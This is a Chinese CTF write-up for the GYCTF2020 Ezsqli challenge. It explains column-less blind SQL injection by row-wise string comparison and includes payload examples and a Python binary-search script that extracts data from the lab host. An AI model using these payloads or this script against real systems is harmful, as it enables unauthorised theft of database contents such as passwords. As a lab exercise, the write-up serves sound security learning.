无列名注入_2 [GYCTF2020]Ezsqli 1
作者:互联网
无列名注入_2
在之前,我们使用了select `1` from (select 1,2 union select * from tableX)a这样一个形式来进行无列名注入,原理可以看我之前写的(抄的)一篇https://www.cnblogs.com/AikN/p/15725756.html
在这个形式被过滤了以后,我们还可以使用另一种方式尝试注入。
基本原理
其实也很简单
sql查询语句 | 返回结果 |
---|---|
(select "b") > (select "a") | 1 |
(select "abce") > (select "abcd") | 1 |
(select "aacd") > (select "abcd") | 1 |
(select "a") > (select "baaa") | 1 |
即如果使用sql语句进行大小比较,会逐位比较,出现不一样的字母时即返回结果。
具体使用中,如有下表account
username | passwd |
---|---|
Aiknr | hhhaaa |
Botm | YouWontKnow! |
我们不知道列名是什么,输入中又过滤了如union的参数,就需要用到这种无列名注入的姿势。
我们只需要逐个位数试就行了
使用payload
(select 1,"a") > (select * from account) -> 0
(select 1,"b") > (select * from account) -> 0
(select 1,"c") > (select * from account) -> 0
...
(select 1,"i") > (select * from account) -> 1
当尝试到“i”的时候,返回正确,因为“i”是第一个超过“h”的字母,即Aiknr账户的密码第一位。这个时候我们就知道了Aiknr账户第一位为“h”
随后,我们把结果拼到payload里,进行下一位的尝试
(select 1,"ha") > (select * from account) -> 0
(select 1,"hb") > (select * from account) -> 0
(select 1,"hc") > (select * from account) -> 0
...
(select 1,"hi") > (select * from account) -> 1
然后,我们就知道密码第二位为"h"了。随后用同样的方法即可以得到全部的密码
这里因为account表有两位,我们想比较的在第二个位置,所以在第二个位置放payload。至于为什么第一个位置放置1,我用题目实验后,发现数字是大于所有字母的,具体可能和php的比较机制有关,不太了解。
题目的脚本借鉴了网上的,发现大伙都是用的遍历,太慢了,还是推荐大家用二分法,平均尝试5-6次就可以得到一位结果。遍历就起飞了,ascii码是几就要遍历几次得到一位。
import requests
url = 'http://3347a09e-7c1e-41c1-b53f-c57dee0bc5c6.node4.buuoj.cn:81/index.php'
MaxLen = 250
flag = ''
for i in range(1,MaxLen):
low = 32
high = 128
mid = (low + high) // 2
while(low < high):
hexchar = flag + chr(mid)
payload = '0^((select 1,"%s")>(select * from f1ag_1s_h3r3_hhhhh))'%(hexchar)
# print(payload)
data = {'id':payload}
r = requests.post(url=url, data=data)
text = r.text
if 'Nu1L' in r.text:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
if(mid == 32 or mid == 127):
break
flag += chr(mid - 1)
print(flag)
最终得到flag
看着怪怪的,交上去也不对,不知道为啥。反正我应该算是做出来了(orz
标签:account,列名,GYCTF2020,mid,flag,low,Ezsqli,payload,select 来源: https://www.cnblogs.com/AikN/p/15851745.html